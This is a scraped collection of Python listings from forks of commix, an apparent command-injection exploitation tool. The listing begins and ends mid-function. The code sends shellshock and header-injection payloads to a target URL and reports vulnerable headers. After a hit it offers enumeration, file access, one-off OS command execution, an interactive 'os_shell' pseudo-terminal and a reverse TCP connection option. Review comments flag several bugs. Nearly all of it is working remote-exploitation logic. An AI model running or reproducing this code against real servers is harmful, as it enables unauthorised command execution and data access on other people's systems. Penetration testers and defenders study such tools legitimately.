          # `in response.info()` tests for a response header with that name.
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+"%"

          sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
          sys.stdout.flush()

          # Print the findings to log file.
          # NOTE(review): this logging sits inside the non-verbose branch, so
          # nothing is logged here when --verbose is set.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vuln_parameter = "HTTP Header"
            vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
          logs.update_payload(filename, counter, payload) 

        # Positive result: the response carries a header named after the probe.
        if cve in response.info():
          no_result = False
          print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
          print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            print ""
            while True:
              enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower()
              if enumerate_again in settings.CHOISE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOISE_NO: 
                break
              elif enumerate_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
              if file_access_again in settings.CHOISE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOISE_NO: 
                break
              elif file_access_again in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if file_access_again == "":
                  file_access_again  = "enter"
                print Back.RED + "(x) Error: '" + file_access_again  + "' is not a valid answer." + Style.RESET_ALL
                pass
          else:
            file_access(url, cve, check_header, filename)

          # A single command given on the command line: run it, print, exit.
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd 
            shell = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL 
            sys.exit(0)

          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                # NOTE(review): the next line is indented with spaces followed
                # by a tab; Python 3 rejects such mixing and Python 2 accepts
                # it only because of how it expands tabs.
               	print ""
              gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                while True:
                  try:
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    # Built-in menu keywords are dispatched locally; anything
                    # else goes to cmd_exec() in the else branch below.
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 
                      if os_shell_option == False:
                        return False
                      elif os_shell_option == "quit":                    
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell": 
                          print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        lhost, lport = reverse_tcp.configure_reverse_tcp()
                        while True:
                          # NOTE(review): this parses as
                          # `lhost and (lport in settings.SHELL_OPTIONS)`;
                          # confirm that is the intended condition.
                          if lhost and lport in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(lhost)
                          else:  
                            cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              # `go_back_again` is set but not read within
                              # this excerpt.
                              go_back_again = True
                              break
                          # Command execution results.
                          shell = cmd_exec(url, cmd, cve, check_header, filename)
                          if menu.options.verbose:
                            print ""
                          print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                      else:
                        pass

                    else: 
                      shell = cmd_exec(url, cmd, cve, check_header, filename)
                      print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" 
                      
                  except KeyboardInterrupt:
                    raise

                  except SystemExit:
                    raise

                  # NOTE(review): bare except -- any other exception is
                  # discarded without a message and the process exits with
                  # status 0.
                  except:
                    print ""
                    sys.exit(0)

              elif gotshell in settings.CHOISE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False 
                  else:
                    return True 

              elif gotshell in settings.CHOISE_QUIT:
                sys.exit(0)

              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                continue
              break
      # for/else: runs when the inner header loop ends without `break`.
      else:
        continue

  except urllib2.HTTPError, err:
    if settings.IGNORE_ERR_MSG == False:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      continue_tests = checks.continue_tests(err)
      if continue_tests == True:
        # With the flag set, this guard is skipped on later HTTP errors.
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
コード例 #19
ファイル: shellshock.py プロジェクト: ardiansn/commix
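def shellshock_handler(url, http_request_method, filename):
  """Probe `url` with the shellshock payloads and run the follow-up menus.

  One request is sent for every (cve, header) pair taken from the
  `shellshock_cves` and `headers` collections; the request carries the payload
  in that single header.  A probe counts as a hit when the CVE identifier is
  found in `response.info()`.  After a hit the function runs enumeration and
  file access, then either executes `menu.options.os_cmd` once and exits or
  offers the interactive pseudo-terminal.

  Args:
    url: Target URL handed to `urllib2.Request`.
    http_request_method: Not used by this function.
    filename: Log file passed to the `logs.*` helpers and to `cmd_exec`.

  Returns:
    True or False (derived from `no_result`) when the operator leaves through
    the shell menus, False when the reverse TCP option check returns 0, and
    None when the loops run to completion or an HTTP error is handled.  Several
    paths end the process with `sys.exit(0)` or `SystemExit`.
  """

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + settings.print_payload(payload))

        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        # NOTE(review): no explicit timeout is passed, so unless a global socket
        # default is set elsewhere an unresponsive server blocks the run here.
        response = urllib2.urlopen(request)

        if not menu.options.verbose:
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))

          if str(float_percent) == "100.0":
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+ "%"

          info_msg = "Testing the " + technique + "... " +  "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

          # Print the findings to log file.
          # NOTE(review): these log writes sit inside the non-verbose branch, so
          # nothing is written to the log when --verbose is set; confirm intent.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vuln_parameter = "HTTP Header"
            vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
          logs.update_payload(filename, counter, payload)

        # Hit: the CVE identifier came back in the response headers.
        if cve in response.info():
          no_result = False
          success_msg = "The (" + check_header + ") '" + Style.UNDERLINE
          success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
          print "\n" + settings.print_success_msg(success_msg)
          print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          if not menu.options.verbose:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            if menu.options.verbose:
              print ""
            # Re-prompt until the answer is one of the yes/no/quit choices.
            while True:
              question_msg = "Do you want to enumerate again? [Y/n/q] > "
              enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if enumerate_again == "":
                  enumerate_again = "enter"
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              question_msg = "Do you want to access files again? [Y/n/q] > "
              file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                if file_access_again == "":
                  file_access_again  = "enter"
                err_msg = "'" + file_access_again  + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            file_access(url, cve, check_header, filename)

          # A single command given on the command line: run it and exit.
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)

          else:
            # Pseudo-Terminal shell
            go_back = False
            # Assigned below but never read inside this function.
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                if menu.options.verbose:
                  print ""
              question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > "
              gotshell = raw_input(settings.print_question_msg(question_msg)).lower()
              if gotshell in settings.CHOICE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    # Tab completer
                    if not readline_error:
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab completer (libedit-backed readline)
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab completer
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      if os_shell_option == False:
                        if no_result == True:
                          return False
                        else:
                          return True
                      elif os_shell_option == "quit":
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell":
                          warn_msg = "You are already into an 'os_shell' mode."
                          print settings.print_warning_msg(warn_msg)+ "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        reverse_tcp.configure_reverse_tcp()
                        while True:
                          # NOTE(review): this parses as
                          # `LHOST and (LPORT in SHELL_OPTIONS)`; confirm that is
                          # the intended test.
                          if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(settings.LHOST)
                          else:
                            cmd = reverse_tcp.reverse_tcp_options()
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              settings.REVERSE_TCP = False
                              break
                          # Command execution results.
                          shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                          if menu.options.verbose:
                            print ""
                          err_msg = "The reverse TCP connection to the target host has been failed!"
                          print settings.print_error_msg(err_msg)
                      else:
                        pass

                    else:
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        if menu.options.verbose:
                          print "\n" + settings.print_payload(payload)
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_error_msg(err_msg) + "\n"

                  except KeyboardInterrupt:
                    raise

                  except SystemExit:
                    raise

                  # NOTE(review): the bare except turns every other error
                  # (EOFError on a closed stdin included) into a silent exit
                  # with status 0, which hides failures from callers.
                  except:
                    print ""
                    sys.exit(0)

              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True

              elif gotshell in settings.CHOICE_QUIT:
                sys.exit(0)

              else:
                if gotshell == "":
                  gotshell = "enter"
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg) + "\n"
                continue
              break
      # The header loop has no `break` of its own, so this else always runs and
      # simply moves on to the next CVE.
      else:
        continue

  except urllib2.HTTPError, err:
    if settings.IGNORE_ERR_MSG == False:
      # Build the message from the caught exception.  `err_msg` is a local that
      # is only bound on some prompt paths, so reading it here raised
      # UnboundLocalError when the first request already failed.
      err_msg = str(err)
      print "\n" + settings.print_error_msg(err_msg)
      continue_tests = checks.continue_tests(err)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()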
コード例 #20
ファイル: requests.py プロジェクト: Mrfnfn/commix
def custom_header_injection(url, vuln_parameter, payload):
  """Send one request that carries `payload` in the configured custom header.

  The request is opened through the user-supplied HTTP proxy when
  `menu.options.proxy` is set, through the Privoxy endpoint taken from
  `settings` when `menu.options.tor` is set, and directly otherwise.

  Returns the elapsed whole seconds when `settings.TIME_RELATIVE_ATTACK` is
  truthy.  Otherwise returns the response object, False after a handled HTTP
  error, or None when opening the request raised ValueError.  A URL error, or
  a refusal to continue after an HTTP error, ends the run with SystemExit.
  `vuln_parameter` is accepted for interface compatibility and not used.
  """

  def _send(target, value, handler):
    # Plain opener unless a proxy handler was selected by the caller.
    if handler is None:
      opener = _urllib.request.build_opener()
    else:
      opener = _urllib.request.build_opener(handler)

    if menu.options.data:
      # POST data defined: the stored user-defined body replaces it first.
      menu.options.data = settings.USER_DEFINED_POST_DATA
      body = menu.options.data.encode(settings.UNICODE_ENCODING)
      request = _urllib.request.Request(target, body)
    else:
      target = parameters.get_url_part(target)
      request = _urllib.request.Request(target)

    # Check if defined extra headers, then attach the custom header itself.
    headers.do_check(request)
    fixed_value = checks.newline_fixation(value)
    request.add_header(settings.CUSTOM_HEADER_NAME, fixed_value)
    try:
      headers.check_http_traffic(request)
      return opener.open(request)
    except ValueError:
      # The caller receives None in this case.
      return None

  if settings.TIME_RELATIVE_ATTACK:
    start = time.time()

  # Pick the proxy handler: explicit HTTP proxy first, then Tor, else none.
  proxy = None
  if menu.options.proxy:
    proxy = _urllib.request.ProxyHandler({settings.SCHEME: menu.options.proxy})
  elif menu.options.tor:
    privoxy_endpoint = settings.PRIVOXY_IP + ":" + settings.PRIVOXY_PORT
    proxy = _urllib.request.ProxyHandler({settings.SCHEME: privoxy_endpoint})

  try:
    response = _send(url, payload, proxy)
  except _urllib.error.HTTPError as http_err:
    # An internal server error is recorded silently; any other status is
    # reported once, unless error messages are already being ignored.
    if str(http_err.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
      shown = str(http_err) + "."
      verbose = settings.VERBOSITY_LEVEL >= 1
      if (not verbose and settings.TIME_BASED_STATE == False) or \
         (verbose and settings.EVAL_BASED_STATE == None):
        print("")
      if verbose and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(shown))
      if checks.continue_tests(http_err) == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
    response = False
  except _urllib.error.URLError as url_err:
    # Drop the first two words of the reason text before printing it.
    reason = ' '.join(str(url_err.reason).split(" ")[2:]) + "."
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print("")
    print(settings.print_critical_msg(reason))
    raise SystemExit()

  if settings.TIME_RELATIVE_ATTACK:
    return int(time.time() - start)
  return response
コード例 #21
ファイル: requests.py プロジェクト: mostafahussein/commix
def custom_header_injection(url, vuln_parameter, payload):
  """Send a request with `payload` placed in the configured custom header.

  The nested helper builds the request (with a body when `menu.options.data`
  is set, otherwise on the result of `parameters.get_url_part(url)`), adds
  `settings.CUSTOM_HEADER_NAME` with the payload and opens it.  This listing
  shows only the HTTP-proxy branch and its error handling; it ends there, so
  the function's return statement is not visible here.
  """

  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # `vuln_parameter` is accepted but not referenced in this helper.

    # Plain opener unless a proxy handler was supplied.
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    # Check if defined POST data
    if menu.options.data:
      # The stored user-defined body replaces the current value first.
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    # Decode the payload, then percent-encode a leading LF or CRLF again so the
    # header value does not start with a raw line break.
    payload = urllib.unquote(payload)
    # Fix for %0a, %0d%0a separators
    if payload[:1] == "\n":
      payload = urllib.quote(payload[:1]) + payload[1:]
    elif payload[:2] == "\r\n":
      payload = urllib.quote(payload[:2]) + payload[2:]   
    request.add_header(settings.CUSTOM_HEADER_NAME, payload)
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      # ValueError is swallowed: the helper then returns None.
      pass

  # Start the clock only for time-relative checks.
  if settings.TIME_RELATIVE_ATTACK :
    start = 0
    end = 0
    start = time.time()

  proxy = None  
  #response = inject_custom_header(url, vuln_parameter, payload, proxy)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      # An internal server error is recorded silently; other statuses are
      # reported unless error messages are already being ignored.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Blank lines keep the message clear of the progress output.
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
          settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print "" 
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      # Every handled HTTP error leaves `response` set to False.
      response = False 
    except urllib2.URLError, err_msg:
      # Drop the first two words of the reason text, print it and stop.
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
コード例 #22
ファイル: requests.py プロジェクト: security-geeks/commix
def host_injection(url, vuln_parameter, payload):
  """Send a request whose Host header is the URL's hostname plus `payload`.

  The nested helper builds the request (with a body when `menu.options.data`
  is set, otherwise on the result of `parameters.get_url_part(url)`), sets the
  'Host' header and opens it.  This listing shows only the HTTP-proxy branch
  and its error handling; it ends there, so the function's return statement
  is not visible here.
  """

  # NOTE(review): `hostname` is None for a URL without a network location, in
  # which case this concatenation raises TypeError; confirm callers always
  # pass an absolute URL.
  payload = urlparse.urlparse(url).hostname + payload

  def inject_host(url, vuln_parameter, payload, proxy):
    # `vuln_parameter` is accepted but not referenced in this helper.

    # Plain opener unless a proxy handler was supplied.
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    # Check if defined POST data
    if menu.options.data:
      # The stored user-defined body replaces the current value first.
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    payload = checks.newline_fixation(payload)  
    request.add_header('Host', payload)
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      # ValueError is swallowed: the helper then returns None.
      pass

  # Start the clock only for time-relative checks.
  if settings.TIME_RELATIVE_ATTACK :
    start = 0
    end = 0
    start = time.time()

  proxy = None 
  #response = inject_host(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy})
      response = inject_host(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      # An internal server error is recorded silently; other statuses are
      # reported unless error messages are already being ignored.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Blank lines keep the message clear of the progress output.
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
          settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print "" 
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      # Every handled HTTP error leaves `response` set to False.
      response = False 
    except urllib2.URLError, err_msg:
      # Drop the first two words of the reason text, print it and stop.
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
コード例 #23
ファイル: shellshock.py プロジェクト: ziv0chou/commix
def shellshock_handler(url, http_request_method, filename):
    """Probe `url` with the shellshock payloads and run the follow-up menus.

    One request is sent for every (cve, header) pair taken from the
    `shellshock_cves` and `headers` collections; the request carries the
    payload in that single header.  A probe counts as a hit when the CVE
    identifier is found in `response.info()`.  After a hit the function runs
    enumeration and file access, then either executes `menu.options.os_cmd`
    once and exits or offers the interactive pseudo-terminal.

    `http_request_method` is not used.  `filename` is passed to the `logs.*`
    helpers and to `cmd_exec`.

    Returns True or False (derived from `no_result`) when the operator leaves
    through the shell menus, False when the reverse TCP option check returns
    0, and None when the loops run to completion or an HTTP error is handled.
    Several paths end the process with `sys.exit(0)` or `SystemExit`.
    """

    counter = 1
    vp_flag = True
    no_result = True
    export_injection_info = False

    injection_type = "results-based command injection"
    technique = "shellshock injection technique"

    sys.stdout.write("(*) Testing the " + technique + "... ")
    sys.stdout.flush()

    try:
        i = 0
        total = len(shellshock_cves) * len(headers)
        for cve in shellshock_cves:
            for check_header in headers:
                i = i + 1
                attack_vector = "echo " + cve + ":Done;"
                payload = shellshock_payloads(cve, attack_vector)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload + Style.RESET_ALL)

                header = {check_header: payload}
                request = urllib2.Request(url, None, header)
                # NOTE(review): no explicit timeout is passed, so unless a
                # global socket default is set elsewhere an unresponsive
                # server blocks the run here.
                response = urllib2.urlopen(request)

                if not menu.options.verbose:
                    # `percent` is overwritten by every branch below.
                    percent = ((i * 100) / total)
                    float_percent = "{0:.1f}".format(
                        round(((i * 100) / (total * 1.0)), 2))

                    if str(float_percent) == "100.0":
                        if no_result == True:
                            percent = Fore.RED + "FAILED" + Style.RESET_ALL
                        else:
                            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                    elif cve in response.info():
                        percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                    else:
                        percent = str(float_percent) + "%"

                    sys.stdout.write("\r(*) Testing the " + technique +
                                     "... " + "[ " + percent + " ]")
                    sys.stdout.flush()

                    # Print the findings to log file.
                    # NOTE(review): these log writes sit inside the
                    # non-verbose branch, so nothing is written to the log
                    # when --verbose is set; confirm intent.
                    if export_injection_info == False:
                        export_injection_info = logs.add_type_and_technique(
                            export_injection_info, filename, injection_type,
                            technique)
                    if vp_flag == True:
                        vuln_parameter = "HTTP Header"
                        vp_flag = logs.add_parameter(vp_flag, filename,
                                                     check_header,
                                                     vuln_parameter, payload)
                    logs.update_payload(filename, counter, payload)

                # Hit: the CVE identifier came back in the response headers.
                if cve in response.info():
                    no_result = False
                    print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL
                    print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title(
                    ) + Style.RESET_ALL + ""
                    print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                    ) + Style.RESET_ALL + ""
                    print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
                    if not menu.options.verbose:
                        print ""
                    # Enumeration options.
                    if settings.ENUMERATION_DONE == True:
                        if menu.options.verbose:
                            print ""
                        # Re-prompt until the answer is a yes/no/quit choice.
                        while True:
                            enumerate_again = raw_input(
                                "(?) Do you want to enumerate again? [Y/n/q] > "
                            ).lower()
                            if enumerate_again in settings.CHOISE_YES:
                                enumeration(url, cve, check_header, filename)
                                break
                            elif enumerate_again in settings.CHOISE_NO:
                                break
                            elif enumerate_again in settings.CHOISE_QUIT:
                                sys.exit(0)
                            else:
                                if enumerate_again == "":
                                    enumerate_again = "enter"
                                print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                                pass
                    else:
                        enumeration(url, cve, check_header, filename)

                    # File access options.
                    if settings.FILE_ACCESS_DONE == True:
                        while True:
                            file_access_again = raw_input(
                                "(?) Do you want to access files again? [Y/n/q] > "
                            ).lower()
                            if file_access_again in settings.CHOISE_YES:
                                file_access(url, cve, check_header, filename)
                                break
                            elif file_access_again in settings.CHOISE_NO:
                                break
                            elif file_access_again in settings.CHOISE_QUIT:
                                sys.exit(0)
                            else:
                                if file_access_again == "":
                                    file_access_again = "enter"
                                print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
                                pass
                    else:
                        file_access(url, cve, check_header, filename)

                    # A single command given on the command line: run it and
                    # exit.
                    if menu.options.os_cmd:
                        cmd = menu.options.os_cmd
                        shell = cmd_exec(url, cmd, cve, check_header, filename)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
                        sys.exit(0)

                    else:
                        # Pseudo-Terminal shell
                        go_back = False
                        # Assigned below but never read inside this function.
                        go_back_again = False
                        while True:
                            if go_back == True:
                                break
                            if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                                if menu.options.verbose:
                                    print ""
                            gotshell = raw_input(
                                "(?) Do you want a Pseudo-Terminal? [Y/n/q] > "
                            ).lower()
                            if gotshell in settings.CHOISE_YES:
                                print ""
                                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                                if readline_error:
                                    checks.no_readline_module()
                                while True:
                                    try:
                                        # Tab completer
                                        if not readline_error:
                                            readline.set_completer(
                                                menu.tab_completer)
                                            # MacOSX tab completer
                                            # (libedit-backed readline)
                                            if getattr(
                                                    readline, '__doc__', ''
                                            ) is not None and 'libedit' in getattr(
                                                    readline, '__doc__', ''):
                                                readline.parse_and_bind(
                                                    "bind ^I rl_complete")
                                            # Unix tab completer
                                            else:
                                                readline.parse_and_bind(
                                                    "tab: complete")
                                        cmd = raw_input("""commix(""" +
                                                        Style.BRIGHT +
                                                        Fore.RED +
                                                        """os_shell""" +
                                                        Style.RESET_ALL +
                                                        """) > """)
                                        cmd = checks.escaped_cmd(cmd)
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            os_shell_option = checks.check_os_shell_options(
                                                cmd.lower(), technique,
                                                go_back, no_result)
                                            if os_shell_option == False:
                                                if no_result == True:
                                                    return False
                                                else:
                                                    return True
                                            elif os_shell_option == "quit":
                                                sys.exit(0)
                                            elif os_shell_option == "back":
                                                go_back = True
                                                break
                                            elif os_shell_option == "os_shell":
                                                print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
                                            elif os_shell_option == "reverse_tcp":
